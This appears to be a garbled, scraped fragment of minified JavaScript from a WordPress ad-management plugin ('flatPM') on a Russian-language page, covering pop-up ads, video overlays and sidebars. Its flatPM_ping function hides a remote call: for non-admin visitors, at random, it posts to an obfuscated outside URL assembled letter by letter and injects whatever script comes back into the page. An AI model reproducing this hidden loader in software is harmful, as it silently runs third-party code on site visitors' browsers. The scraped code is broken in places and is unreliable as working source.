0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика